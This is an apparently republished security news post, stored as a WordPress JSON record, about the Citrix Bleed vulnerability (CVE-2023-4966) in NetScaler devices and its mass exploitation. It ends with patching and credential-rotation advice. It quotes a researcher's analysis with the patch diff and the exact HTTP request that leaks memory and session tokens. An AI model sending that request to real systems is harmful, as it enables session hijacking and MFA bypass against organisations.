{"id":54387,"date":"2023-10-31T12:55:03","date_gmt":"2023-10-31T12:55:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/35180\/Citrix-Bleed-Bug-Under-Mass-Exploitation.html"},"modified":"2023-10-31T12:55:03","modified_gmt":"2023-10-31T12:55:03","slug":"citrix-bleed-bug-under-mass-exploitation","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/citrix-bleed-bug-under-mass-exploitation\/","title":{"rendered":"Citrix Bleed Bug Under Mass Exploitation"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/05\/system-hacked-800x450.jpg\" alt=\"\u201cThis vulnerability is now under mass exploitation.\u201d Citrix Bleed bug bites hard\"><figcaption class=\"caption\">\n<div class=\"caption-credit\">Getty Images<\/div>\n<\/figcaption><\/figure>\n<p>A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.<\/p>\n<p>Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. 
The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix\u2019s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation <a href=\"https:\/\/arstechnica.com\/security\/2023\/10\/the-latest-high-severity-citrix-vulnerability-under-attack-isnt-easy-to-fix\/\">since August<\/a>. Citrix issued a patch on October 10.<\/p>\n<h2>Repeat: This is not a drill<\/h2>\n<p>Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to <a href=\"https:\/\/doublepulsar.com\/mass-exploitation-of-citrixbleed-vulnerability-including-a-ransomware-group-1405cbb9de18\">declare<\/a>: \u201cThis vulnerability is now under mass exploitation.\u201d He went on to say, \u201cFrom talking to multiple organizations, they are seeing widespread exploitation.\u201d<\/p>\n<p>He said that <a href=\"https:\/\/cyberplace.social\/@GossiTheDog\/111313594140810442\">as of Saturday<\/a>, he had found an estimated 20,000 instances of exploited Citrix devices where session tokens had been stolen. He said his estimate was based on running a honeypot of servers that masquerade as vulnerable Netscaler devices to track opportunistic attacks on the Internet. Beaumont then compared those results with other data, including some provided by <a href=\"https:\/\/en.wikipedia.org\/wiki\/NetFlow\">Netflow<\/a> and the Shodan search engine.<\/p>\n<p>Meanwhile, GreyNoise, a security company that also deploys honeypots, was showing exploits for CVE-2023-4966 coming from <a href=\"https:\/\/viz.greynoise.io\/query?gnql=tags%3A%22Citrix%20ADC%20Netscaler%20CVE-2023-4966%20Information%20Disclosure%20Attempt%22\">135 IP addresses<\/a> when this post went live on Ars. 
That\u2019s a 27-fold increase from the five IPs GreyNoise saw five days ago.<\/p>\n<p>The most recent numbers available from security organization Shadowserver showed that there were <a href=\"https:\/\/dashboard.shadowserver.org\/statistics\/combined\/time-series\/?date_range=30&amp;source=http_vulnerable&amp;source=http_vulnerable6&amp;tag=cve-2023-4966%2B&amp;group_by=geo&amp;style=stacked\">roughly 5,500 unpatched devices<\/a>. Beaumont has acknowledged that the estimate is at odds with his estimate of 20,000 compromised devices. It\u2019s not immediately clear what was causing the discrepancy.<\/p>\n<p>The vulnerability is relatively easy for experienced people to exploit. A simple reverse-engineering of the patch Citrix released shows the functions that are vulnerable, and from there, it\u2019s not hard to write code that exploits them. Making attacks even easier, a handful of proof-of-concept exploits are available online.<\/p>\n<p>In a <a href=\"https:\/\/www.assetnote.io\/resources\/research\/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\">detailed technical analysis<\/a>, researchers from Assetnote wrote:<\/p>\n<blockquote>\n<p>We found two functions that stood out <code>ns_aaa_oauth_send_openid_config<\/code> and <code>ns_aaa_oauthrp_send_openid_config<\/code>. Both functions perform a similar operation, they implement the OpenID Connect Discovery endpoint. The functions are both accessible unauthenticated via the <code>\/oauth\/idp\/.well-known\/openid-configuration<\/code> and <code>\/oauth\/rp\/.well-known\/openid-configuration<\/code> endpoints respectively.<\/p>\n<p>Both functions also included the same patch, an additional bounds check before sending the response. 
This can be seen in the snippets below showing the before and after for <code>ns_aaa_oauth_send_openid_config<\/code>.<\/p>\n<p><strong>Original<\/strong><\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-c\">iVar3 = snprintf(print_temp_rule,0x20000, \"{\\\"issuer\\\": \\\"https:\/\/%.*s\\\", \\\"authorization_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/login\\\", \\\"token_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/token\\\", \\\"jwks_uri\\\": \\\"https:\/\/%.*s\/oauth\/idp\/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"token\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end_session_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/logout\\\", \\\"frontchannel_logout_supported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_supported\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr\\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\",uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nauthv2_json_resp = 1;\niVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,iVar3);\n<\/code><\/pre>\n<\/div>\n<p><strong>Patched<\/strong><\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-c\">uVar7 = snprintf(print_temp_rule,0x20000, \"{\\\"issuer\\\": \\\"https:\/\/%.*s\\\", \\\"authorization_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/login\\\", \\\"token_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/token\\\", \\\"jwks_uri\\\": \\\"https:\/\/%.*s\/oauth\/idp\/certs\\\", \\\"response_types_supported\\\": [\\\"code\\\", \\\"token\\\", \\\"id_token\\\"], \\\"id_token_signing_alg_values_supported\\\": [\\\"RS256\\\"], \\\"end_session_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/logout\\\", 
\\\"frontchannel_logout_supported\\\": true, \\\"scopes_supported\\\": [\\\"openid\\\", \\\"ctxs_cc\\\"], \\\"claims_supported\\\": [\\\"sub\\\", \\\"iss\\\", \\\"aud\\\", \\\"exp\\\", \\\"iat\\\", \\\"auth_time\\\", \\\"acr\\\", \\\"amr\\\", \\\"email\\\", \\\"given_name\\\", \\\"family_name\\\", \\\"nickname\\\"], \\\"userinfo_endpoint\\\": \\\"https:\/\/%.*s\/oauth\/idp\/userinfo\\\", \\\"subject_types_supported\\\": [\\\"public\\\"]}\",uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8,uVar5,pbVar8);\nuVar4 = 0x20;\nif (uVar7 &lt; 0x20000) {\n    authv2_json_resp = 1;\n    iVar3 = ns_vpn_send_response(param_1,0x100040,print_temp_rule,uVar7);\n    ...\n}\n<\/code><\/pre>\n<\/div>\n<p>The function is pretty simple, it generates a JSON payload for the OpenID configuration and uses <code>snprintf<\/code> to insert the device&#8217;s hostname at the appropriate locations in the payload. In the original version, the response is sent immediately. In the patched version, the response is only sent if <code>snprintf<\/code> returns a value less than <code>0x20000<\/code>.<\/p>\n<p>The vulnerability occurs because the return value of <code>snprintf<\/code> is used to determine how many bytes are sent to the client by <code>ns_vpn_send_response<\/code>. This is a problem because <code>snprintf<\/code> does not return how many bytes it <strong>did<\/strong> write to the buffer, <code>snprintf<\/code> returns how many bytes it <strong>would have<\/strong> written to the buffer if the buffer was big enough.<\/p>\n<p>To exploit this, all we needed to do was figure out how to get the response to exceed the buffer size of <code>0x20000<\/code> bytes. The application would then respond with the completely filled buffer, plus whatever memory immediately followed the <code>print_temp_rule<\/code> buffer.<\/p>\n<h3>Exploiting the Endpoint<\/h3>\n<p>Initially we thought the endpoint would probably not be exploitable. 
The only data that was inserted was the hostname, which is something that needed administrator access to configure. Luckily for us, we were wrong and the value inserted into the payload did not come from the configured hostname. It actually came from the HTTP <code>Host<\/code> header.<\/p>\n<p>We were also fortunate that NetScaler inserts the hostname into the payload six times, as this meant we could hit the buffer limit of <code>0x20000<\/code> bytes without running into issues because either the <code>Host<\/code> header or the whole request was too long.<\/p>\n<p>We put together the following request and sent it to our NetScaler instance.<\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-http\">GET \/oauth\/idp\/.well-known\/openid-configuration HTTP\/1.1\nHost: a &lt;repeated 24812 times&gt;\nConnection: close\n<\/code><\/pre>\n<\/div>\n<p>We received the response shown below with the non-printable characters removed.<\/p>\n<div class=\"w-embed\">\n<pre><code class=\"language-http\">HTTP\/1.1 200 OK\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nContent-Length: 147441\nCache-control: no-cache, no-store, must-revalidate\nPragma: no-cache\nContent-Type: application\/json; charset=utf-8\nX-Citrix-Application: Receiver for Web {\"issuer\": \"https:\/\/aaaaa ...&lt;omitted&gt;... 
aaaaaaaaaaaaaaaa\u00ed\u00a7\u00a1\n\u00f0\n\u00ed\u00a7\u00a1-\u00aa\u00bct\u00d9\u00cc\u00e5Dx013.1.48.47\u00e0\nd98cd79972b2637450836d4009793b100c3a01f2245525d5f4f58455e445a4a42HTTP\/1.1 200 OK\nContent-Length: @@@@@\nEncode:@@@\nCache-control: no-cache\nPragma: no-cache\nContent-Type: text\/html\nSet-Cookie: NSC_AAAC=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;Secure;HttpOnly;Path=\/ {\"categories\":[],\"resources\":[],\"subscriptionsEnabled\":false,\"username\":null}\n\u00f0\n\u00e5\n\u00e5\nP\u00cf\u00cf\nH\u00a1\n\u00e9\u00d2\u00cf\neG\u00c1\"RDEFAULT\n\u00f2 #pack200-gzip\ncompressdeflategzip\ndentity\n\u00fe\u00ff\u00ff\u00ff\u00ff\u00ff\n\u00a9VPN_GLOBAL\u00ff\u00ff\u00ff\u00ff\u00ff\u00ff \u00e8\"AAA_PARAM\u00ed\n<\/code><\/pre>\n<\/div>\n<p>We could clearly see a lot of leaked memory immediately following the JSON payload. While a lot of it was null bytes, there was some suspicious looking information in the response.<\/p>\n<\/blockquote>\n<p> The name Citrix Bleed is an allusion to Heartbleed, a different critical information disclosure vulnerability that <a href=\"https:\/\/arstechnica.com\/information-technology\/2014\/05\/four-weeks-on-huge-swaths-of-the-internet-remain-vulnerable-to-heartbleed\/\">turned the Internet on its head<\/a> in 2014. That vulnerability, which resided in the OpenSSL code library, came under mass exploitation and allowed the pilfering of passwords, encryption keys, banking credentials, and all kinds of other sensitive information. Citrix Bleed isn\u2019t as dire because there are fewer vulnerable devices in use.<\/p>\n<p>But Citrix Bleed is still plenty bad. Organizations should consider all Netscaler devices to have been compromised. This means patching any remaining unpatched devices. 
Then, all credentials should be rotated to ensure any session tokens that might have been leaked are invalidated. Last, organizations should inspect their devices and infrastructure for signs of compromise. Security firm Mandiant has in-depth security guidance <a href=\"https:\/\/services.google.com\/fh\/files\/misc\/citrix-netscaler-adc-gateway-cve-2023-4966-remediation.pdf\">here<\/a>.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/35180\/Citrix-Bleed-Bug-Under-Mass-Exploitation.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":54388,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[277],"tags":[145],"class_list":["post-54387","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-blogs","tag-headlinehackerdata-lossflaw"],"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/54387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=54387"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/54387\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/54388"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=54387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=54387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=54387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}